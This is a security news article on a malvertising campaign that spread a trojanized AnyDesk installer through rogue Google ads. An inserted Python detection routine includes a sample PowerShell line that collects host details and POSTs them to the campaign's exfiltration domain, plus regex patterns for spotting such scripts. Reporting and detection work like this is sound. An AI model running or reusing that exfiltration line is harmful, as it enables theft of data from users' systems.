On Wednesday, cybersecurity researchers disclosed the disruption of a clever malvertising campaign targeting users of the AnyDesk remote access software on PCs, laptops and mobile devices. The campaign delivers a weaponized installer via rogue Google ads that appear in search engine results pages (SERPs).
The malvertising campaign is believed to have commenced as early as April 21, 2021. It involves a malicious file posing as an AnyDesk setup executable (AnyDeskSetup.exe). When this setup is executed, it downloads a PowerShell implant that collects and exfiltrates system information.
“The script had some obfuscation and multiple functions that resembled an implant as well as a hardcoded domain (zoomstatistic[.]com) to ‘POST’ reconnaissance information such as user name, hostname, operating system, IP address and the current process name,” researchers from CrowdStrike said in an analysis.
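As an added illustration (not code from the article or from CrowdStrike), the Python routine below triages constructed PowerShell script-block log records for the combination the researchers describe: collection of user name, hostname, OS, IP address and process name, followed by a POST to the hardcoded domain. The sample records, process names and the reconnaissance regexes are assumptions made for the example.

```python
import re

# Constructed PowerShell script-block log records (Event ID 4104 style), not real telemetry.
# Fields: record id, process that loaded the script, script text.
SAMPLE_SCRIPT_BLOCKS = [
    ("1", "AnyDeskSetup.exe",
     "$u=$env:USERNAME;$h=$env:COMPUTERNAME;"
     "$o=(Get-CimInstance Win32_OperatingSystem).Caption;"
     "$ip=(Invoke-RestMethod http://ipinfo.io/ip);$p=(Get-Process -Id $PID).Name;"
     "Invoke-RestMethod -Method POST -Uri http://zoomstatistic.com/ -Body @{u=$u;h=$h;o=$o;ip=$ip;p=$p}"),
    ("2", "powershell.exe",
     "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"),
    ("3", "explorer.exe",
     "$h=$env:COMPUTERNAME; Invoke-WebRequest -Uri https://inventory.example.internal/ -Method Post -Body $h"),
]

# One pattern per reconnaissance item the implant is reported to collect (assumed heuristics).
RECON_SIGNALS = {
    "username": re.compile(r"\$env:USERNAME|whoami", re.I),
    "hostname": re.compile(r"\$env:COMPUTERNAME|hostname|\[System\.Net\.Dns\]", re.I),
    "os": re.compile(r"Win32_OperatingSystem|\[Environment\]::OSVersion", re.I),
    "ip": re.compile(r"ipinfo\.io|ifconfig\.me|Get-NetIPAddress", re.I),
    "process": re.compile(r"\$PID|Get-Process", re.I),
}
# Outbound POST through the usual PowerShell HTTP primitives.
POST_SIGNAL = re.compile(r"(Invoke-RestMethod|Invoke-WebRequest)[^\n]*-Method\s+Post|\.UploadString\(", re.I)
# Domain reported for this campaign (defanged on the page as zoomstatistic[.]com).
KNOWN_C2 = re.compile(r"zoomstatistic\.com", re.I)


def triage_script_block(process_name, script):
    """Return the reasons a script block resembles the reconnaissance implant, or [] if none."""
    reasons = []
    if KNOWN_C2.search(script):
        reasons.append("known C2 domain zoomstatistic.com")
    recon = [name for name, rx in RECON_SIGNALS.items() if rx.search(script)]
    # A single host-name lookup plus a POST is common in legitimate inventory scripts,
    # so require at least two distinct recon items before calling it exfiltration.
    if POST_SIGNAL.search(script) and len(recon) >= 2:
        reasons.append("POSTs recon data: " + ",".join(recon))
    # Lineage is only corroboration: an installer running PowerShell is not suspicious by itself.
    if reasons and process_name.lower().endswith("setup.exe"):
        reasons.append("script executed from an installer process")
    return reasons


def triage_all(records):
    """Map record id -> reasons, keeping only records that trip at least one rule."""
    return {rid: r for rid, proc, script in records if (r := triage_script_block(proc, script))}
```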
According to statistics on the remote access company’s website, AnyDesk’s remote desktop software has been downloaded by more than a million users across the globe. The cybersecurity firm has not attributed the activity to a particular threat actor or nexus, but, given the large user base, it suspects this is a “widespread campaign affecting a wide range of customers”.
While the PowerShell script has all the properties of a typical backdoor, the intrusion route is a little different, suggesting that this goes beyond an ordinary data-collection operation. The trojanized AnyDesk installer is distributed via malicious Google Ads that the threat actor places, and these ads are served to unsuspecting individuals who use Google’s search engine to look for AnyDesk.
When these individuals click the fraudulent ad results, they are redirected to a social engineering page that is a clone of the legitimate AnyDesk website and that links directly to the trojanized installer.
CrowdStrike estimates that 40% of clicks on the malicious ad turned into installations that included follow-on hands-on-keyboard activity.
“While it is unknown what percentage of Google searches for AnyDesk resulted in clicks on the ad, a 40% Trojan installation rate from an ad click shows that this is an extremely successful method of gaining remote access across a wide range of potential targets,” the researchers said.
The AnyDesk company has also stated that it notified Google of its findings, and Google is said to have taken immediate action to pull the advertisement in question.
“This malicious use of Google Ads is an effective and clever way to get mass deployment of shells, as it provides the threat actor with the ability to freely pick and choose their target(s) of interest,” the researchers concluded.
“Because of the nature of the Google advertising platform, it can provide a really good estimate of how many people will click on the ad. From that, the threat actor can adequately plan and budget based on this information. In addition to targeting tools like AnyDesk or other administrative tools, the threat actor can target privileged/administrative users in a unique way.”
Source: The Hacker News